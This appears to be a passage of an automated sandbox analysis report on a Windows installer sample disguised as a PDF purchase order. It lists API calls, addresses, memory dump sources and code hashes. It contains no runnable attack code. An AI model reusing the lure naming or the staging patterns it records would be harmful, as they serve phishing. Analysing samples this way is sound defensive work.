                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                            • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                            • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                            • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                            • MulDiv.KERNEL32(0007803D,00000064,00078041), ref: 00402D4D
                                                                                                            • wsprintfW.USER32 ref: 00402D5D
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                            Strings
                                                                                                            • verifying installer: %d%%, xrefs: 00402D57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-82062127
                                                                                                            • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                            • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                            • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                            • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D59
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID: Calibri
                                                                                                            • API String ID: 3808545654-1409258342
                                                                                                            • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                            • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                            • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                            • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                            APIs
                                                                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                            • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                            • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                            • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                            • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                            • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                            • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsiEA09.tmp$C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll
                                                                                                            • API String ID: 3109718747-3235459135
                                                                                                            • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                            • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                            • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                            • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2979337801-0
                                                                                                            • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                            • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                            • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                            • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                            • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                            • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                            • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                            • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1148316912-0
                                                                                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                            • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                            • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                            • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                            • wsprintfW.USER32 ref: 00404A1A
                                                                                                            • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s
                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                            • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                            • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                            • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                            • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                            • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                            • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                            • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3677997916-1824292864
                                                                                                            • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                            • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                            • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                            • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-3081826266
                                                                                                            • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                            • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                            • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
